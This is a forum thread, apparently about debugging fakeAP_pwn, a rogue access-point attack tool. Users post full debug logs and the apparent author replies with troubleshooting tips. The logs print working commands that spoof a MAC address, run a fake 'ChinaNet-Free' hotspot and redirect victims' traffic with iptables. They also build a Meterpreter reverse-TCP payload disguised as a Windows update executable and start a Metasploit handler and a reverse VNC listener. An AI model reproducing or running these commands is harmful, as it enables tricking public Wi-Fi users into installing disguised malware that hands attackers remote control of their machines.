Enable debug mode and try running it again.
Thanks for your suggestion, here is still the same problem.
Code:
[*] fakeAP_pwn v0.3 (#127)
display~info Debug mode
[i] Debug mode
display~action Analyzing: Environment
[>] Analyzing: Environment
display~diag Testing: Internet connection
[+] Testing: Internet connection
display~error Internet access: Failed
[!] Internet access: Failed
display~info Switching mode: non
[i] Switching mode: non
display~info interface=eth0
[i] wifiInterface=wlan0
[i] apInterface=at0
[i] essid=ChinaNet-Free
[i] channel=1
[i] apType=airbase-ng
[i] mode=non
[i] payload=vnc
[i] backdoorPath=/root/backdoor.exe
[i] www=/var/www/fakeAP_pwn
[i] respond2All=false
[i] macMode=set
[i] fakeMac=00:05:7c:9a:58:3f
[i] extras=false
[i] mtuMonitor=1800
[i] mtuAP=1400
[i] diagnostics=false
[i] verbose=1
[i] debug=true
[i] gateway=
[i] ourIP=10.0.0.1
[i] port=14267
[i] wifiDriver=iwlagn
[i] interface=eth0
[i] wifiInterface=wlan0
[i] apInterface=at0
[i] essid=ChinaNet-Free
[i] channel=1
[i] apType=airbase-ng
[i] mode=non
[i] payload=vnc
[i] backdoorPath=/root/backdoor.exe
[i] www=/var/www/fakeAP_pwn
[i] respond2All=false
[i] macMode=set
[i] fakeMac=00:05:7c:9a:58:3f
[i] extras=false
[i] mtuMonitor=1800
[i] mtuAP=1400
[i] diagnostics=false
[i] verbose=1
[i] debug=true
[i] gateway=
[i] ourIP=10.0.0.1
[i] port=14267
[i] wifiDriver=iwlagn
display~action Configuring: Environment
[>] Configuring: Environment
cleanUp~remove
display~action Removing: Temp files
[>] Removing: Temp files
action~Removing temp files rm -rfv /root/fakeAP_pwn/tmp
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Removing temp files" -e "rm -rfv /root/fakeAP_pwn/tmp"
display~action Stopping: Daemons & Programs
[>] Stopping: Daemons & Programs
action~Stopping killall airbase-ng hostapd xterm dhcpcd dnsmasq sbd vnc apache2 ; /etc/init.d/dhcp3-server stop ; /etc/init.d/apparmor stop ; /etc/init.d/dnsmasq stop ; /etc/init.d/apache2 stop
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Stopping" -e " killall airbase-ng hostapd xterm dhcpcd dnsmasq sbd vnc apache2 ; /etc/init.d/dhcp3-server stop ; /etc/init.d/apparmor stop ; /etc/init.d/dnsmasq stop ; /etc/init.d/apache2 stop"
action~Refreshing wlan0 ifconfig wlan0 down && ifconfig wlan0 up && sleep 1
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Refreshing wlan0" -e "ifconfig wlan0 down && ifconfig wlan0 up && sleep 1"
display~action Configuring: Wireless card
[>] Configuring: Wireless card
action~Monitor Mode (Starting) airmon-ng start wlan0
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Monitor Mode (Starting)" -e "airmon-ng start wlan0"
display~info monitorInterface=mon0
[i] monitorInterface=mon0
action~MTU ifconfig "mon0" mtu "1800"
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - MTU" -e "ifconfig "mon0" mtu "1800""
display~action Configuring: MAC address
[>] Configuring: MAC address
action~Configuring MAC ifconfig mon0 down ; macchanger -m 00:05:7c:9a:58:3f mon0 ; ifconfig mon0 up
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Configuring MAC" -e "ifconfig mon0 down ; macchanger -m 00:05:7c:9a:58:3f mon0 ; ifconfig mon0 up"
display~info mac=00:05:7c:9a:58:3f (Rco Security Ab)
[i] mac=00:05:7c:9a:58:3f (Rco Security Ab)
display~action Creating: Scripts
[>] Creating: Scripts
#....here is too much code
display~action Creating: Exploit (Windows)
[>] Creating: Exploit (Windows)
action~Metasploit (Windows) /opt/metasploit3/bin/msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 R | /opt/metasploit3/bin/msfencode -x /var/www/fakeAP_pwn/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/fakeAP_pwn/Windows-KB183905-x86-ENU.exe
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Metasploit (Windows)" -e "/opt/metasploit3/bin/msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 R | /opt/metasploit3/bin/msfencode -x /var/www/fakeAP_pwn/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/fakeAP_pwn/Windows-KB183905-x86-ENU.exe"
display~action Creating: Access point
[>] Creating: Access point
action~Access Point killall airbase-ng ; sleep 1 ; airbase-ng -a 00:05:7c:9a:58:3f -W 0 -c 1 -e "ChinaNet-Free" -v mon0 true 0|0|4
xterm -geometry 84x4+0+0 -T "fakeAP_pwn v0.3 (#127) - Access Point" -e "killall airbase-ng ; sleep 1 ; airbase-ng -a 00:05:7c:9a:58:3f -W 0 -c 1 -e "ChinaNet-Free" -v mon0"
display~action Configuring: Network
[>] Configuring: Network
action~Setting up at0 ifconfig lo up ;
ifconfig at0 10.0.0.1 netmask 255.255.255.0 ;
ifconfig at0 mtu 1400 ;
ifconfig mon0 mtu 1800 ;
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 at0 ;
echo "1" > /proc/sys/net/ipv4/ip_forward
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Setting up at0" -e "ifconfig lo up ;
ifconfig at0 10.0.0.1 netmask 255.255.255.0 ;
ifconfig at0 mtu 1400 ;
ifconfig mon0 mtu 1800 ;
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 at0 ;
echo "1" > /proc/sys/net/ipv4/ip_forward"
ipTables~clear
action~iptables iptables -F ; iptables -X ; iptables -t filter -F ; iptables -t filter -X ; iptables -t filter -Z ; iptables -t nat -F ; iptables -t nat -X ; iptables -t nat -Z ; iptables -t mangle -F ; iptables -t mangle -X ; iptables -t mangle -Z
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - iptables" -e "iptables -F ; iptables -X ; iptables -t filter -F ; iptables -t filter -X ; iptables -t filter -Z ; iptables -t nat -F ; iptables -t nat -X ; iptables -t nat -Z ; iptables -t mangle -F ; iptables -t mangle -X ; iptables -t mangle -Z"
ipTables~force at0
action~iptables iptables --table nat --append PREROUTING --in-interface at0 --proto tcp --jump DNAT --to 10.0.0.1 ;
iptables --table nat --append PREROUTING --in-interface at0 --jump REDIRECT ;
iptables --table nat --append PREROUTING --in-interface at0 -m limit --liit 1/second --jump LOG --log-prefix "fakeAP_pwn (PREROUTING): " --log-level 7
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - iptables" -e "iptables --table nat --append PREROUTING --in-interface at0 --proto tcp --jump DNAT --to 10.0.0.1 ;
iptables --table nat --append PREROUTING --in-interface at0 --jump REDIRECT ;
iptables --table nat --append PREROUTING --in-interface at0 -m limit --liit 1/second --jump LOG --log-prefix "fakeAP_pwn (PREROUTING): " --log-level 7"
display~action Configuring: Permissions
Is it something wrong with iptables? Do you have any idea?
Code:
[>] Configuring: Permissions
action~DHCP mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - DHCP" -e "mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd"
display~action Starting: DHCP
[>] Starting: DHCP
action~DHCP dhcpd3 -d -f -cf /root/fakeAP_pwn/tmp/fakeAP_pwn.dhcp -pf /var/run/dhcpd/dhcpd.pid at0 true 0|80|5
xterm -geometry 84x5+0+80 -T "fakeAP_pwn v0.3 (#127) - DHCP" -e "dhcpd3 -d -f -cf /root/fakeAP_pwn/tmp/fakeAP_pwn.dhcp -pf /var/run/dhcpd/dhcpd.pid at0"
display~action Starting: DNS
[>] Starting: DNS
action~DNS dnsmasq -C /root/fakeAP_pwn/tmp/fakeAP_pwn.dns
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - DNS" -e "dnsmasq -C /root/fakeAP_pwn/tmp/fakeAP_pwn.dns"
action~DNS tail -f /root/fakeAP_pwn/tmp/fakeAP_pwn.log.dnsmasq | grep -v DHCP false 0|173|5
xterm -geometry 84x5+0+173 -T "fakeAP_pwn v0.3 (#127) - DNS" -e " tail -f /root/fakeAP_pwn/tmp/fakeAP_pwn.log.dnsmasq | grep -v DHCP"
display~action Starting: Exploit
[>] Starting: Exploit
action~Metasploit (Windows) /opt/metasploit3/bin/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 AutoRunScript=/root/fakeAP_pwn/tmp/fakeAP_pwn.rb INTERFACE=at0 E true 0|265|15
xterm -geometry 84x15+0+265 -T "fakeAP_pwn v0.3 (#127) - Metasploit (Windows)" -e "/opt/metasploit3/bin/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 AutoRunScript=/root/fakeAP_pwn/tmp/fakeAP_pwn.rb INTERFACE=at0 E"
display~action Starting: Web server
[>] Starting: Web server
action~Web Sever /etc/init.d/apache2 start && ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeAP_pwn && a2enmod ssl && a2enmod php5 && /etc/init.d/apache2 reload
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Web Sever" -e "/etc/init.d/apache2 start && ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeAP_pwn && a2enmod ssl && a2enmod php5 && /etc/init.d/apache2 reload"
display~action Monitoring: Connections
[>] Monitoring: Connections
display~action Starting: VNC
[>] Starting: VNC
display~info Waiting for the target to run the "update" file
[i] Waiting for the target to run the "update" file
action~VNC vncviewer -listen -encodings Tight -noraiseonbeep -bgr233 -compresslevel 7 -quality 0 true 0|580|3
action~Connections watch -d -n 1 "arp -n -v -i at0" false 0|487|5
xterm -geometry 84x3+0+580 -T "fakeAP_pwn v0.3 (#127) - VNC" -e "vncviewer -listen -encodings Tight -noraiseonbeep -bgr233 -compresslevel 7 -quality 0"
xterm -geometry 84x5+0+487 -T "fakeAP_pwn v0.3 (#127) - Connections" -e "watch -d -n 1 "arp -n -v -i at0""
^CcleanUp~interrupt
display~info *** BREAK ***
[i] *** BREAK ***
action~Killing xterm killall xterm
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Killing xterm" -e "killall xterm"
display~action Restoring: Environment
[>] Restoring: Environment
display~action Restoring: Programs
[>] Restoring: Programs
action~Monitor Mode (Stopping) airmon-ng stop mon0
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Monitor Mode (Stopping)" -e "airmon-ng stop mon0"
action~Stopping/Starting /etc/init.d/squid stop ; /etc/init.d/apache2 stop ; /etc/init.d/dnsmasq stop ; /etc/init.d/wicd start ; service network-manager start
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Stopping/Starting" -e "/etc/init.d/squid stop ; /etc/init.d/apache2 stop ; /etc/init.d/dnsmasq stop ; /etc/init.d/wicd start ; service network-manager start"
display~action Restoring: Network
[>] Restoring: Network
action~Restoring: Network echo "0" > /proc/sys/net/ipv4/ip_forward
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Restoring: Network" -e " echo "0" > /proc/sys/net/ipv4/ip_forward"
action~ipTables cat /var/log/kern.log | grep fakeAP_pwn > /root/fakeAP_pwn/tmp/fakeAP_pwn.log.iptables
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - ipTables" -e "cat /var/log/kern.log | grep fakeAP_pwn > /root/fakeAP_pwn/tmp/fakeAP_pwn.log.iptables"
ipTables~clear
action~iptables iptables -F ; iptables -X ; iptables -t filter -F ; iptables -t filter -X ; iptables -t filter -Z ; iptables -t nat -F ; iptables -t nat -X ; iptables -t nat -Z ; iptables -t mangle -F ; iptables -t mangle -X ; iptables -t mangle -Z
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - iptables" -e "iptables -F ; iptables -X ; iptables -t filter -F ; iptables -t filter -X ; iptables -t filter -Z ; iptables -t nat -F ; iptables -t nat -X ; iptables -t nat -Z ; iptables -t mangle -F ; iptables -t mangle -X ; iptables -t mangle -Z"
[*] Done! (= Have you... g0tmi1k?
I have the same problem with svn 127.
With the older version:
It starts up, everything looks good, AP shows up at the client, but when I hit connect I don't get ANY IP from the fakeAP DHCP. Even when I enter some valid IP by myself to the "victim" I DON'T get any connection.
Does anybody have at least a clue where I should look at... I don't have any ideas.
Running on Dell 830 + Alfa USB WLAN.
Try to connect with another Dell 630, iPhone, iPad, nothing.
Sadly my awus036h / rtl8187 chipset seems not to support hostap nor any other AP services. Can somebody verify this?
result of iw list -> http://pastebin.com/9YE6DRYQ
Fun thing is, if I fire up the script I can see the AP. I managed to get it to work one time (within 4-5h of trying), maybe this was just a coincidence?
I would just like to point out, for best result use a "real install" - not one used in a Virtual Machine.
Looking forward to Coovachill! =D
It sounds like you're having a DNS issue. Can you surf to 10.0.0.1? Does that work? Else are you getting an IP address?
Hmmm... How long did you have to wait for the page to load?
This has happened before...
Could you try using a different MTU value? 1400, 1500 and/or 1800?
It's been a while since I've worked on this project, since then I've now moved to BT4 R2. I'm planning on starting work on it again during the summer.
Thanks for reporting back with another pointer about fluxbox/KDE.
It's a messy script, plus a lot of moving parts! I'm hoping that v0.4 will be better! ;)
Thanks! Any feedback is welcome. =)
Thanks for doing that! :)
I plan to automate this in the script when I've tested it.
A few people have got this and it has been a bug in older versions. Which version are you using?
It's a known issue. I've found a better method to detect internet access for the next release :)
Are you using airbase-ng or hostapd?
Are you running it in VM? (VirtualBox or VMware?)
I've had this when using airbase-ng and in a VM. Sometimes it needs to be run a few times. You're best trying to connect with the Dell before the mobile devices too.
Quote:
Are you using airbase-ng or hostapd?
I am using airbase-ng.
Quote:
Are you running it in VM? (VirtualBox or VMware?)
Nope, don't run any VMs. Clean newest Backtrack install. Victim client is a Dell machine with Intel wifi NICs.